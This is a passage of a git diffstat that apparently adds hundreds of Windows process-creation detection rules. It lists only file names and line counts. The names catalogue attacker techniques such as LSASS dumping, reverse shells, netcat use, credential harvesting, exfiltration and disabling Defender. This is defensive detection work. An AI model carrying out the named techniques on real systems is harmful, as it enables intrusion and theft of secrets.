...ation_win_lolbin_visual_basic_compiler.yml | 27 + ...ation_win_lolbin_visualuiaverifynative.yml | 29 + ...c_creation_win_lolbin_vsiisexelauncher.yml | 30 + .../proc_creation_win_lolbin_wfc.yml | 27 + .../proc_creation_win_lolbin_wlrmdr.yml | 42 + ..._creation_win_lolbin_workflow_compiler.yml | 34 + ...oc_creation_win_lolscript_register_app.yml | 34 + .../proc_creation_win_lsass_process_clone.yml | 30 + ..._creation_win_malware_conti_shadowcopy.yml | 36 + ...oc_creation_win_malware_script_dropper.yml | 43 + ...roc_creation_win_mftrace_child_process.yml | 26 + ...reation_win_mmc_mmc20_lateral_movement.yml | 29 + ...oc_creation_win_mmc_susp_child_process.yml | 40 + .../proc_creation_win_mofcomp_execution.yml | 55 + ...ion_win_mpcmdrun_dll_sideload_defender.yml | 38 + ...n_win_mpcmdrun_download_arbitrary_file.yml | 36 + ...run_remove_windows_defender_definition.yml | 37 + ...eation_win_msbuild_susp_parent_process.yml | 34 + ...n_win_msdt_arbitrary_command_execution.yml | 37 + ...roc_creation_win_msdt_susp_cab_options.yml | 37 + .../proc_creation_win_msdt_susp_parent.yml | 43 + ...roc_creation_win_msedge_proxy_download.yml | 31 + .../proc_creation_win_mshta_http.yml | 33 + ...roc_creation_win_mshta_inline_vbscript.yml | 30 + .../proc_creation_win_mshta_javascript.yml | 30 + ...creation_win_mshta_lethalhta_technique.yml | 27 + ...reation_win_mshta_susp_child_processes.yml | 52 + ...proc_creation_win_mshta_susp_execution.yml | 45 + .../proc_creation_win_mshta_susp_pattern.yml | 58 + .../proc_creation_win_msiexec_dll.yml | 35 + .../proc_creation_win_msiexec_embedding.yml | 40 + .../proc_creation_win_msiexec_execute_dll.yml | 47 + ...roc_creation_win_msiexec_install_quiet.yml | 56 + ...oc_creation_win_msiexec_install_remote.yml | 49 + ...proc_creation_win_msiexec_masquerading.yml | 32 + .../proc_creation_win_msiexec_web_install.yml | 33 + .../proc_creation_win_msohtmed_download.yml | 33 + .../proc_creation_win_mspub_download.yml | 33 + 
...reation_win_mssql_sqlps_susp_execution.yml | 37 + ...on_win_mssql_sqltoolsps_susp_execution.yml | 35 + ..._creation_win_mssql_susp_child_process.yml | 49 + ...n_win_mssql_veaam_susp_child_processes.yml | 56 + ...reation_win_mstsc_rdp_hijack_shadowing.yml | 29 + ...c_creation_win_mstsc_remote_connection.yml | 36 + ..._creation_win_mstsc_run_local_rdp_file.yml | 35 + ...mstsc_run_local_rdp_file_susp_location.yml | 43 + ...n_mstsc_run_local_rpd_file_susp_parent.yml | 43 + .../proc_creation_win_msxsl_execution.yml | 30 + ...oc_creation_win_msxsl_remote_execution.yml | 27 + ..._win_net_default_accounts_manipulation.yml | 72 + ...tion_win_net_groups_and_accounts_recon.yml | 65 + ..._win_net_network_connections_discovery.yml | 38 + ...eation_win_net_share_and_sessions_enum.yml | 40 + .../proc_creation_win_net_share_unmount.yml | 35 + .../proc_creation_win_net_start_service.yml | 33 + .../proc_creation_win_net_stop_service.yml | 33 + .../proc_creation_win_net_susp_execution.yml | 61 + ...creation_win_net_use_mount_admin_share.yml | 38 + ...ation_win_net_use_mount_internet_share.yml | 35 + .../proc_creation_win_net_use_mount_share.yml | 38 + ...reation_win_net_use_password_plaintext.yml | 43 + .../proc_creation_win_net_user_add.yml | 44 + ...creation_win_net_user_add_never_expire.yml | 39 + .../proc_creation_win_netsh_fw_add_rule.yml | 37 + ...etsh_fw_allow_program_in_susp_location.yml | 65 + .../proc_creation_win_netsh_fw_allow_rdp.yml | 39 + ...proc_creation_win_netsh_fw_delete_rule.yml | 35 + .../proc_creation_win_netsh_fw_disable.yml | 44 + ...reation_win_netsh_fw_enable_group_rule.yml | 37 + ..._creation_win_netsh_fw_rules_discovery.yml | 38 + .../proc_creation_win_netsh_fw_set_rule.yml | 32 + ...ation_win_netsh_helper_dll_persistence.yml | 41 + ...proc_creation_win_netsh_packet_capture.yml | 33 + ...roc_creation_win_netsh_port_forwarding.yml | 50 + ...reation_win_netsh_port_forwarding_3389.yml | 35 + ...n_win_netsh_wifi_credential_harvesting.yml | 35 + 
.../proc_creation_win_nltest_execution.yml | 33 + .../proc_creation_win_nltest_recon.yml | 55 + .../proc_creation_win_node_abuse.yml | 39 + ...on_win_node_adobe_creative_cloud_abuse.yml | 32 + ...creation_win_nslookup_domain_discovery.yml | 29 + ...eation_win_nslookup_poweshell_download.yml | 38 + .../proc_creation_win_ntdsutil_susp_usage.yml | 42 + .../proc_creation_win_ntdsutil_usage.yml | 26 + ...c_creation_win_odbcconf_driver_install.yml | 36 + ...ation_win_odbcconf_driver_install_susp.yml | 36 + ...ation_win_odbcconf_exec_susp_locations.yml | 54 + ...ation_win_odbcconf_register_dll_regsvr.yml | 39 + ..._win_odbcconf_register_dll_regsvr_susp.yml | 36 + ...oc_creation_win_odbcconf_response_file.yml | 40 + ...eation_win_odbcconf_response_file_susp.yml | 45 + ...on_win_odbcconf_uncommon_child_process.yml | 28 + ...tion_win_office_arbitrary_cli_download.yml | 43 + ...win_office_excel_dcom_lateral_movement.yml | 37 + ...win_office_exec_from_trusted_locations.yml | 54 + ...in_office_onenote_susp_child_processes.yml | 129 + ...utlook_enable_unsafe_client_mail_rules.yml | 32 + ...win_office_outlook_execution_from_temp.yml | 27 + ...in_office_outlook_susp_child_processes.yml | 70 + ...ce_outlook_susp_child_processes_remote.yml | 33 + ..._office_spawn_exe_from_users_directory.yml | 44 + ...eation_win_office_susp_child_processes.yml | 139 + ...c_creation_win_office_winword_dll_load.yml | 34 + ...flinescannershell_mpclient_sideloading.yml | 35 + ...ion_win_pdqdeploy_runner_susp_children.yml | 59 + ...tion_win_perl_inline_command_execution.yml | 29 + ...ation_win_php_inline_command_execution.yml | 30 + .../proc_creation_win_ping_hex_ip.yml | 31 + .../proc_creation_win_pktmon_execution.yml | 27 + ...proc_creation_win_plink_susp_tunneling.yml | 37 + .../proc_creation_win_powercfg_execution.yml | 38 + ...ershell_aadinternals_cmdlets_execution.yml | 61 + ...ell_active_directory_module_dll_import.yml | 44 + ..._win_powershell_add_windows_capability.yml | 38 + 
...win_powershell_amsi_init_failed_bypass.yml | 37 + ...n_win_powershell_amsi_null_bits_bypass.yml | 31 + ..._creation_win_powershell_audio_capture.yml | 33 + ...tion_win_powershell_base64_encoded_cmd.yml | 48 + ...win_powershell_base64_frombase64string.yml | 33 + ...roc_creation_win_powershell_base64_iex.yml | 50 + ..._creation_win_powershell_base64_invoke.yml | 49 + ...ion_win_powershell_base64_mppreference.yml | 46 + ...rshell_base64_reflection_assembly_load.yml | 51 + ...base64_reflection_assembly_load_obfusc.yml | 59 + ...tion_win_powershell_base64_wmi_classes.yml | 80 + ..._creation_win_powershell_cl_invocation.yml | 28 + ...reation_win_powershell_cl_loadassembly.yml | 30 + ...ation_win_powershell_cl_mutexverifiers.yml | 36 + ...ershell_cmdline_convertto_securestring.yml | 36 + ...in_powershell_cmdline_reversed_strings.yml | 68 + ..._powershell_cmdline_special_characters.yml | 46 + ...hell_computer_discovery_get_adcomputer.yml | 46 + ...creation_win_powershell_create_service.yml | 32 + ...oc_creation_win_powershell_decode_gzip.yml | 27 + ...reation_win_powershell_decrypt_pattern.yml | 54 + ...in_powershell_defender_disable_feature.yml | 90 + ...tion_win_powershell_defender_exclusion.yml | 40 + ...isable_defender_av_security_monitoring.yml | 53 + ...eation_win_powershell_disable_firewall.yml | 46 + ...ion_win_powershell_disable_ie_features.yml | 36 + ..._creation_win_powershell_dll_execution.yml | 44 + ...eation_win_powershell_downgrade_attack.yml | 39 + ...on_win_powershell_download_com_cradles.yml | 41 + ...eation_win_powershell_download_cradles.yml | 32 + ...c_creation_win_powershell_download_dll.yml | 33 + ...c_creation_win_powershell_download_iex.yml | 43 + ...ation_win_powershell_download_patterns.yml | 43 + ...oc_creation_win_powershell_email_exfil.yml | 34 + ...l_enable_susp_windows_optional_feature.yml | 43 + .../proc_creation_win_powershell_encode.yml | 42 + ...on_win_powershell_encoded_cmd_patterns.yml | 50 + 
...creation_win_powershell_encoded_obfusc.yml | 57 + ...ation_win_powershell_encoding_patterns.yml | 57 + ...creation_win_powershell_exec_data_file.yml | 36 + ...tion_win_powershell_export_certificate.yml | 34 + ...eation_win_powershell_frombase64string.yml | 28 + ...in_powershell_frombase64string_archive.yml | 31 + ..._creation_win_powershell_get_clipboard.yml | 30 + ...powershell_get_localgroup_member_recon.yml | 43 + ...eation_win_powershell_getprocess_lsass.yml | 30 + ...creation_win_powershell_hidden_b64_cmd.yml | 83 + ...wershell_hide_services_via_set_service.yml | 43 + ...c_creation_win_powershell_iex_patterns.yml | 46 + ..._powershell_import_cert_susp_locations.yml | 37 + ...win_powershell_import_module_susp_dirs.yml | 43 + ...ershell_install_unsigned_appx_packages.yml | 40 + ...ion_win_powershell_invocation_specific.yml | 75 + ...powershell_invoke_webrequest_direct_ip.yml | 49 + ..._powershell_invoke_webrequest_download.yml | 56 + ...ion_win_powershell_mailboxexport_share.yml | 34 + ...ation_win_powershell_malicious_cmdlets.yml | 247 + ..._powershell_msexchange_transport_agent.yml | 31 + ...n_powershell_non_interactive_execution.yml | 45 + ...on_win_powershell_obfuscation_via_utf8.yml | 28 + ..._creation_win_powershell_public_folder.yml | 43 + ...wershell_remotefxvgpudisablement_abuse.yml | 36 + ...in_powershell_reverse_shell_connection.yml | 38 + ...ion_win_powershell_run_script_from_ads.yml | 34 + ...owershell_run_script_from_input_stream.yml | 31 + ...roc_creation_win_powershell_sam_access.yml | 36 + ...on_win_powershell_script_engine_parent.yml | 34 + ..._service_dacl_modification_set_service.yml | 44 + .../proc_creation_win_powershell_set_acl.yml | 42 + ...n_win_powershell_set_acl_susp_location.yml | 53 + ...ershell_set_policies_to_unsecure_level.yml | 50 + ...on_win_powershell_set_service_disabled.yml | 34 + ...ion_win_powershell_shadowcopy_deletion.yml | 45 + ...reation_win_powershell_snapins_hafnium.yml | 45 + 
...c_creation_win_powershell_stop_service.yml | 33 + ...on_win_powershell_susp_child_processes.yml | 48 + ..._win_powershell_susp_download_patterns.yml | 36 + ...in_powershell_susp_parameter_variation.yml | 137 + ...ion_win_powershell_susp_parent_process.yml | 65 + ...reation_win_powershell_susp_ps_appdata.yml | 38 + ...on_win_powershell_susp_ps_downloadfile.yml | 32 + ...ll_tamper_defender_remove_mppreference.yml | 34 + ...ation_win_powershell_token_obfuscation.yml | 37 + ...n_powershell_user_discovery_get_aduser.yml | 45 + ...eation_win_powershell_webclient_casing.yml | 178 + ...creation_win_powershell_x509enrollment.yml | 32 + ...reation_win_powershell_xor_commandline.yml | 55 + ...c_creation_win_powershell_zip_compress.yml | 39 + ...creation_win_presentationhost_download.yml | 33 + ...resentationhost_uncommon_location_exec.yml | 35 + ...ation_win_pressanykey_lolbin_execution.yml | 31 + ...oc_creation_win_print_remote_file_copy.yml | 33 + ..._creation_win_protocolhandler_download.yml | 34 + ...reation_win_provlaunch_potential_abuse.yml | 54 + ...tion_win_provlaunch_susp_child_process.yml | 53 + ...c_creation_win_psr_capture_screenshots.yml | 31 + ...proc_creation_win_pua_3proxy_execution.yml | 31 + ...oc_creation_win_pua_adfind_enumeration.yml | 43 + ...roc_creation_win_pua_adfind_susp_usage.yml | 60 + ...c_creation_win_pua_advanced_ip_scanner.yml | 38 + ...creation_win_pua_advanced_port_scanner.yml | 34 + ...creation_win_pua_advancedrun_priv_user.yml | 46 + .../proc_creation_win_pua_chisel.yml | 43 + .../proc_creation_win_pua_cleanwipe.yml | 37 + .../proc_creation_win_pua_crassus.yml | 27 + .../proc_creation_win_pua_csexec.yml | 31 + .../proc_creation_win_pua_defendercheck.yml | 27 + .../proc_creation_win_pua_ditsnap.yml | 28 + .../proc_creation_win_pua_frp.yml | 40 + .../proc_creation_win_pua_iox.yml | 41 + .../proc_creation_win_pua_netcat.yml | 45 + .../proc_creation_win_pua_ngrok.yml | 56 + .../proc_creation_win_pua_nimgrab.yml | 35 + 
.../proc_creation_win_pua_nircmd.yml | 47 + ...proc_creation_win_pua_nircmd_as_system.yml | 32 + .../proc_creation_win_pua_nmap_zenmap.yml | 32 + .../proc_creation_win_pua_nps.yml | 42 + .../proc_creation_win_pua_nsudo.yml | 52 + .../proc_creation_win_pua_pingcastle.yml | 189 + ...ation_win_pua_pingcastle_script_parent.yml | 94 + .../proc_creation_win_pua_process_hacker.yml | 67 + ...proc_creation_win_pua_rcedit_execution.yml | 45 + ...proc_creation_win_pua_rclone_execution.yml | 63 + .../proc_creation_win_pua_runxcmd.yml | 35 + .../proc_creation_win_pua_seatbelt.yml | 60 + .../proc_creation_win_pua_system_informer.yml | 49 + ...oc_creation_win_pua_webbrowserpassview.yml | 27 + ..._creation_win_pua_wsudo_susp_execution.yml | 37 + .../proc_creation_win_python_adidnsdump.yml | 29 + ...on_win_python_inline_command_execution.yml | 40 + .../proc_creation_win_python_pty_spawn.yml | 37 + .../proc_creation_win_query_session_exfil.yml | 28 + .../proc_creation_win_rar_compress_data.yml | 28 + ...tion_win_rar_compression_with_password.yml | 33 + ...eation_win_rar_susp_greedy_compression.yml | 46 + .../proc_creation_win_rasdial_execution.yml | 27 + ...eation_win_rdrleakdiag_process_dumping.yml | 46 + .../proc_creation_win_reg_add_run_key.yml | 32 + .../proc_creation_win_reg_add_safeboot.yml | 35 + .../proc_creation_win_reg_bitlocker.yml | 40 + ..._credential_access_via_password_filter.yml | 30 + ...oc_creation_win_reg_defender_exclusion.yml | 37 + .../proc_creation_win_reg_delete_safeboot.yml | 34 + .../proc_creation_win_reg_delete_services.yml | 32 + ...tion_win_reg_desktop_background_change.yml | 58 + ...direct_asep_registry_keys_modification.yml | 40 + ..._creation_win_reg_disable_sec_services.yml | 49 + ...eation_win_reg_dumping_sensitive_hives.yml | 63 + ...numeration_for_credentials_in_registry.yml | 42 + ...n_win_reg_import_from_suspicious_paths.yml | 41 + ...n_win_reg_lsa_disable_restricted_admin.yml | 35 + ...on_win_reg_lsa_ppl_protection_disabled.yml | 33 + 
.../proc_creation_win_reg_machineguid.yml | 29 + ...n_win_reg_modify_group_policy_settings.yml | 40 + .../proc_creation_win_reg_nolmhash.yml | 36 + .../proc_creation_win_reg_open_command.yml | 43 + .../proc_creation_win_reg_query_registry.yml | 38 + .../proc_creation_win_reg_rdp_keys_tamper.yml | 52 + .../proc_creation_win_reg_screensaver.yml | 57 + ...ation_win_reg_service_imagepath_change.yml | 37 + ...oc_creation_win_reg_software_discovery.yml | 35 + .../proc_creation_win_reg_susp_paths.yml | 39 + .../proc_creation_win_reg_volsnap_disable.yml | 28 + ...eation_win_reg_windows_defender_tamper.yml | 69 + ...reg_write_protect_for_storage_disabled.yml | 30 + ...m_regsvcs_uncommon_extension_execution.yml | 44 + ...sm_regsvcs_uncommon_location_execution.yml | 46 + ...ation_win_regedit_export_critical_keys.yml | 47 + .../proc_creation_win_regedit_export_keys.yml | 47 + .../proc_creation_win_regedit_import_keys.yml | 50 + ...c_creation_win_regedit_import_keys_ads.yml | 47 + ..._creation_win_regedit_trustedinstaller.yml | 29 + .../proc_creation_win_regini_ads.yml | 37 + .../proc_creation_win_regini_execution.yml | 37 + ...tion_win_registry_cimprovider_dll_load.yml | 32 + ...gistry_enumeration_for_credentials_cli.yml | 48 + ...urity_zone_protocol_defaults_downgrade.yml | 35 + ...registry_install_reg_debugger_backdoor.yml | 38 + ...roc_creation_win_registry_logon_script.yml | 29 + ...tion_win_registry_new_network_provider.yml | 38 + ...y_privilege_escalation_via_service_key.yml | 34 + ...gistry_provlaunch_provisioning_command.yml | 33 + ...egistry_set_unsecure_powershell_policy.yml | 38 + ...n_win_registry_typed_paths_persistence.yml | 25 + ...oc_creation_win_regsvr32_flags_anomaly.yml | 33 + ..._creation_win_regsvr32_http_ip_pattern.yml | 67 + ..._creation_win_regsvr32_network_pattern.yml | 40 + ...roc_creation_win_regsvr32_remote_share.yml | 29 + ...eation_win_regsvr32_susp_child_process.yml | 49 + ...creation_win_regsvr32_susp_exec_path_1.yml | 38 + 
...creation_win_regsvr32_susp_exec_path_2.yml | 67 + ..._creation_win_regsvr32_susp_extensions.yml | 56 + ...proc_creation_win_regsvr32_susp_parent.yml | 41 + ...eation_win_regsvr32_uncommon_extension.yml | 43 + ...eation_win_remote_access_tools_anydesk.yml | 35 + ...s_tools_anydesk_piped_password_via_cli.yml | 31 + ...te_access_tools_anydesk_silent_install.yml | 34 + ..._remote_access_tools_anydesk_susp_exec.yml | 40 + ...mote_access_tools_netsupport_susp_exec.yml | 33 + ...ccess_tools_rurat_non_default_location.yml | 32 + ...mote_access_tools_screenconnect_access.yml | 31 + ...ote_access_tools_screenconnect_anomaly.yml | 31 + ...access_tools_screenconnect_remote_exec.yml | 32 + ...roc_creation_win_remote_time_discovery.yml | 33 + .../proc_creation_win_renamed_adfind.yml | 64 + .../proc_creation_win_renamed_autoit.yml | 52 + .../proc_creation_win_renamed_browsercore.yml | 28 + .../proc_creation_win_renamed_cloudflared.yml | 92 + .../proc_creation_win_renamed_createdump.yml | 42 + .../proc_creation_win_renamed_curl.yml | 31 + .../proc_creation_win_renamed_gpg4win.yml | 27 + ...oc_creation_win_renamed_netsupport_rat.yml | 30 + ..._creation_win_renamed_office_processes.yml | 53 + .../proc_creation_win_renamed_paexec.yml | 47 + .../proc_creation_win_renamed_pingcastle.yml | 60 + .../proc_creation_win_renamed_pressanykey.yml | 32 + ...win_renamed_rundll32_dllregisterserver.yml | 31 + ...tion_win_renamed_sysinternals_procdump.yml | 42 + .../proc_creation_win_renamed_vmnat.yml | 28 + ...reation_win_rpcping_credential_capture.yml | 46 + ...tion_win_ruby_inline_command_execution.yml | 29 + ..._win_rundll32_ads_stored_dll_execution.yml | 32 + ...ndll32_advpack_obfuscated_ordinal_call.yml | 34 + .../proc_creation_win_rundll32_by_ordinal.yml | 51 + .../proc_creation_win_rundll32_inline_vbs.yml | 30 + ...eation_win_rundll32_installscreensaver.yml | 30 + ...ion_win_rundll32_js_runhtmlapplication.yml | 29 + .../proc_creation_win_rundll32_keymgr.yml | 31 + 
...win_rundll32_mshtml_runhtmlapplication.yml | 30 + .../proc_creation_win_rundll32_no_params.yml | 34 + .../proc_creation_win_rundll32_ntlmrelay.yml | 37 + ...n_win_rundll32_obfuscated_ordinal_call.yml | 30 + ..._creation_win_rundll32_parent_explorer.yml | 32 + ..._win_rundll32_process_dump_via_comsvcs.yml | 59 + ...on_win_rundll32_registered_com_objects.yml | 36 + ...oc_creation_win_rundll32_run_locations.yml | 38 + .../proc_creation_win_rundll32_script_run.yml | 35 + ...on_win_rundll32_shell32_susp_execution.yml | 40 + ...rundll32_shelldispatch_potential_abuse.yml | 28 + ...oc_creation_win_rundll32_susp_activity.yml | 111 + ...ion_win_rundll32_susp_control_dll_load.yml | 35 + ...32_susp_execution_with_image_extension.yml | 45 + ..._win_rundll32_susp_shellexec_execution.yml | 42 + ...tion_win_rundll32_susp_shimcache_flush.yml | 43 + .../proc_creation_win_rundll32_sys.yml | 30 + .../proc_creation_win_rundll32_unc_path.yml | 31 + ...on_win_rundll32_uncommon_dll_extension.yml | 43 + .../proc_creation_win_rundll32_user32_dll.yml | 35 + ...n_win_rundll32_webdav_client_execution.yml | 34 + ..._rundll32_webdav_client_susp_execution.yml | 58 + ...eation_win_rundll32_without_parameters.yml | 37 + .../proc_creation_win_runonce_execution.yml | 32 + ..._change_sevice_image_path_by_non_admin.yml | 38 + .../proc_creation_win_sc_create_service.yml | 33 + .../proc_creation_win_sc_disable_service.yml | 35 + ...proc_creation_win_sc_new_kernel_driver.yml | 34 + .../proc_creation_win_sc_query.yml | 30 + ...ion_win_sc_sdset_allow_service_changes.yml | 42 + ...ation_win_sc_sdset_deny_service_access.yml | 45 + ...roc_creation_win_sc_sdset_hide_sevices.yml | 47 + ...roc_creation_win_sc_sdset_modification.yml | 39 + ...ation_win_sc_service_path_modification.yml | 57 + ..._win_sc_service_tamper_for_persistence.yml | 59 + .../proc_creation_win_sc_stop_service.yml | 36 + ...tion_win_schtasks_appdata_local_system.yml | 44 + .../proc_creation_win_schtasks_change.yml | 76 + 
.../proc_creation_win_schtasks_creation.yml | 38 + ...tion_win_schtasks_creation_temp_folder.yml | 35 + .../proc_creation_win_schtasks_delete.yml | 42 + .../proc_creation_win_schtasks_delete_all.yml | 29 + .../proc_creation_win_schtasks_disable.yml | 44 + .../proc_creation_win_schtasks_env_folder.yml | 77 + ...oc_creation_win_schtasks_folder_combos.yml | 43 + ...c_creation_win_schtasks_guid_task_name.yml | 39 + ...n_schtasks_one_time_only_midnight_task.yml | 43 + .../proc_creation_win_schtasks_parent.yml | 36 + ...schtasks_persistence_windows_telemetry.yml | 36 + .../proc_creation_win_schtasks_reg_loader.yml | 48 + ...eation_win_schtasks_reg_loader_encoded.yml | 46 + ...oc_creation_win_schtasks_schedule_type.yml | 42 + ...tion_win_schtasks_schedule_type_system.yml | 41 + ...asks_schedule_via_masqueraded_xml_file.yml | 54 + ...roc_creation_win_schtasks_susp_pattern.yml | 67 + .../proc_creation_win_schtasks_system.yml | 52 + ...reation_win_scrcons_susp_child_process.yml | 43 + ..._creation_win_sdbinst_shim_persistence.yml | 41 + ...oc_creation_win_sdbinst_susp_extension.yml | 48 + .../proc_creation_win_sdclt_child_process.yml | 27 + ...roc_creation_win_sdiagnhost_susp_child.yml | 43 + .../proc_creation_win_secedit_execution.yml | 55 + ..._creation_win_servu_susp_child_process.yml | 43 + ...oc_creation_win_setspn_spn_enumeration.yml | 35 + .../proc_creation_win_shutdown_execution.yml | 29 + .../proc_creation_win_shutdown_logoff.yml | 27 + ...eation_win_sndvol_susp_child_processes.yml | 27 + ...eation_win_soundrecorder_audio_capture.yml | 28 + ...proc_creation_win_splwow64_cli_anomaly.yml | 27 + ...ation_win_spoolsv_susp_child_processes.yml | 87 + ...roc_creation_win_sqlcmd_veeam_db_recon.yml | 37 + .../proc_creation_win_sqlcmd_veeam_dump.yml | 32 + ...ation_win_sqlite_chromium_profile_data.yml | 45 + ..._win_sqlite_firefox_gecko_profile_data.yml | 36 + .../proc_creation_win_squirrel_download.yml | 44 + ..._creation_win_squirrel_proxy_execution.yml | 72 + 
.../proc_creation_win_ssh_port_forward.yml | 32 + .../proc_creation_win_ssh_rdp_tunneling.yml | 30 + .../proc_creation_win_ssm_agent_abuse.yml | 33 + ...eation_win_stordiag_susp_child_process.yml | 35 + ...oc_creation_win_susp_16bit_application.yml | 30 + ...ation_win_susp_abusing_debug_privilege.yml | 55 + ...on_win_susp_add_user_local_admin_group.yml | 40 + ...win_susp_add_user_remote_desktop_group.yml | 45 + ...eation_win_susp_alternate_data_streams.yml | 48 + ...ays_install_elevated_windows_installer.yml | 55 + .../proc_creation_win_susp_appx_execution.yml | 51 + ...ary_shell_execution_via_settingcontent.yml | 34 + ...reation_win_susp_archiver_iso_phishing.yml | 33 + ...creation_win_susp_automated_collection.yml | 48 + ...n_susp_bad_opsec_sacrificial_processes.yml | 64 + ...tion_win_susp_child_process_as_system_.yml | 46 + ...n_win_susp_cli_obfuscation_escape_char.yml | 33 + ...ation_win_susp_cli_obfuscation_unicode.yml | 52 + ...usp_commandline_path_traversal_evasion.yml | 38 + ...oc_creation_win_susp_copy_browser_data.yml | 73 + ...reation_win_susp_copy_lateral_movement.yml | 64 + ...proc_creation_win_susp_copy_system_dir.yml | 57 + ...eation_win_susp_copy_system_dir_lolbin.yml | 64 + ...creation_win_susp_crypto_mining_monero.yml | 50 + ...ion_win_susp_data_exfiltration_via_cli.yml | 71 + ...proc_creation_win_susp_disable_raccine.yml | 38 + ...roc_creation_win_susp_double_extension.yml | 71 + ...ation_win_susp_double_extension_parent.yml | 67 + ...eation_win_susp_download_office_domain.yml | 42 + ...reation_win_susp_dumpstack_log_evasion.yml | 27 + ...on_win_susp_elavated_msi_spawned_shell.yml | 41 + ...reation_win_susp_electron_app_children.yml | 98 + ...tion_win_susp_electron_exeuction_proxy.yml | 65 + ..._elevated_system_shell_uncommon_parent.yml | 73 + .../proc_creation_win_susp_embed_exe_lnk.yml | 29 + ...tion_win_susp_etw_modification_cmdline.yml | 37 + ...oc_creation_win_susp_etw_trace_evasion.yml | 57 + .../proc_creation_win_susp_eventlog_clear.yml | 
63 + ...eation_win_susp_eventlog_content_recon.yml | 84 + ..._susp_execution_from_guid_folder_names.yml | 45 + ...execution_from_public_folder_as_parent.yml | 45 + .../proc_creation_win_susp_execution_path.yml | 56 + ...tion_win_susp_execution_path_webserver.yml | 37 + ...win_susp_gather_network_info_execution.yml | 37 + ...n_win_susp_hidden_dir_index_allocation.yml | 34 + ...in_susp_hiding_malware_in_fonts_folder.yml | 56 + ...win_susp_homoglyph_cyrillic_lookalikes.yml | 81 + .../proc_creation_win_susp_image_missing.yml | 41 + ...ation_win_susp_inline_base64_mz_header.yml | 29 + ...reation_win_susp_inline_win_api_access.yml | 79 + ...p_local_system_owner_account_discovery.yml | 62 + ..._win_susp_lolbin_exec_from_non_c_drive.yml | 56 + ...eation_win_susp_lsass_dmp_cli_keywords.yml | 53 + ...tion_win_susp_ms_appinstaller_download.yml | 33 + ...proc_creation_win_susp_network_command.yml | 32 + ...oc_creation_win_susp_network_scan_loop.yml | 35 + ...roc_creation_win_susp_network_sniffing.yml | 33 + .../proc_creation_win_susp_non_exe_image.yml | 84 + ...c_creation_win_susp_non_priv_reg_or_ps.yml | 47 + .../proc_creation_win_susp_ntds.yml | 76 + ...creation_win_susp_nteventlogfile_usage.yml | 38 + ..._win_susp_ntfs_short_name_path_use_cli.yml | 49 + ...in_susp_ntfs_short_name_path_use_image.yml | 50 + ...ation_win_susp_ntfs_short_name_use_cli.yml | 54 + ...ion_win_susp_ntfs_short_name_use_image.yml | 61 + ...eation_win_susp_obfuscated_ip_download.yml | 58 + ...reation_win_susp_obfuscated_ip_via_cli.yml | 53 + ..._creation_win_susp_office_token_search.yml | 29 + .../proc_creation_win_susp_parents.yml | 48 + ...in_susp_priv_escalation_via_named_pipe.yml | 39 + ...c_creation_win_susp_private_keys_recon.yml | 53 + ...susp_privilege_escalation_cli_patterns.yml | 42 + ...oc_creation_win_susp_proc_wrong_parent.yml | 53 + .../proc_creation_win_susp_progname.yml | 73 + .../proc_creation_win_susp_recon.yml | 41 + ...on_win_susp_recycle_bin_fake_execution.yml | 33 + 
...on_win_susp_redirect_local_admin_share.yml | 31 + ...tion_win_susp_remote_desktop_tunneling.yml | 32 + ...eation_win_susp_right_to_left_override.yml | 29 + ...n_win_susp_script_exec_from_env_folder.yml | 62 + ...reation_win_susp_script_exec_from_temp.yml | 46 + ...roc_creation_win_susp_service_creation.yml | 59 + .../proc_creation_win_susp_service_dir.yml | 40 + .../proc_creation_win_susp_service_tamper.yml | 244 + ...eation_win_susp_shadow_copies_creation.yml | 42 + ...eation_win_susp_shadow_copies_deletion.yml | 73 + ...tion_win_susp_shell_spawn_susp_program.yml | 74 + .../proc_creation_win_susp_sysnative.yml | 28 + ...c_creation_win_susp_system_exe_anomaly.yml | 96 + ..._creation_win_susp_system_user_anomaly.yml | 102 + .../proc_creation_win_susp_sysvol_access.yml | 29 + ..._creation_win_susp_task_folder_evasion.yml | 43 + .../proc_creation_win_susp_use_of_te_bin.yml | 31 + ...tion_win_susp_use_of_vsjitdebugger_bin.yml | 35 + .../proc_creation_win_susp_userinit_child.yml | 34 + ...tion_win_susp_weak_or_abused_passwords.yml | 35 + ...n_win_susp_web_request_cmd_and_cmdlets.yml | 45 + ...proc_creation_win_susp_whoami_as_param.yml | 27 + .../proc_creation_win_susp_workfolders.yml | 29 + ...in_svchost_execution_with_no_cli_flags.yml | 36 + ...eation_win_svchost_termserv_proc_spawn.yml | 39 + ...on_win_svchost_uncommon_parent_process.yml | 38 + ...sinternals_accesschk_check_permissions.yml | 45 + ..._win_sysinternals_adexplorer_execution.yml | 32 + ...sysinternals_adexplorer_susp_execution.yml | 39 + ...reation_win_sysinternals_eula_accepted.yml | 32 + ...tion_win_sysinternals_livekd_execution.yml | 27 + ...sysinternals_livekd_kernel_memory_dump.yml | 33 + ...roc_creation_win_sysinternals_procdump.yml | 29 + ...tion_win_sysinternals_procdump_evasion.yml | 41 + ...eation_win_sysinternals_procdump_lsass.yml | 36 + ...tion_win_sysinternals_psexec_execution.yml | 28 + ...nternals_psexec_paexec_escalate_system.yml | 73 + ...n_sysinternals_psexec_remote_execution.yml | 
32 + ...roc_creation_win_sysinternals_psexesvc.yml | 30 + ...on_win_sysinternals_psexesvc_as_system.yml | 31 + ...oc_creation_win_sysinternals_psloglist.yml | 52 + ...oc_creation_win_sysinternals_psservice.yml | 30 + ...n_win_sysinternals_pssuspend_execution.yml | 33 + ..._sysinternals_pssuspend_susp_execution.yml | 35 + ..._sysinternals_susp_psexec_paexec_flags.yml | 75 + ..._win_sysinternals_sysmon_config_update.yml | 32 + ...tion_win_sysinternals_sysmon_uninstall.yml | 33 + ...on_win_sysinternals_tools_masquerading.yml | 179 + .../proc_creation_win_sysprep_appdata.yml | 28 + ...proc_creation_win_systeminfo_execution.yml | 28 + ...ettingsadminflows_turn_on_dev_features.yml | 35 + ...roc_creation_win_takeown_recursive_own.yml | 34 + ...proc_creation_win_tapinstall_execution.yml | 32 + .../proc_creation_win_tar_compression.yml | 37 + .../proc_creation_win_tar_extraction.yml | 34 + .../proc_creation_win_taskkill_sep.yml | 34 + ..._creation_win_tasklist_basic_execution.yml | 28 + .../proc_creation_win_taskmgr_localsystem.yml | 27 + ...reation_win_taskmgr_susp_child_process.yml | 33 + ...ms_suspicious_command_line_cred_access.yml | 33 + ...on_win_tpmvscmgr_add_virtual_smartcard.yml | 27 + .../proc_creation_win_tscon_localsystem.yml | 31 + .../proc_creation_win_tscon_rdp_redirect.yml | 30 + 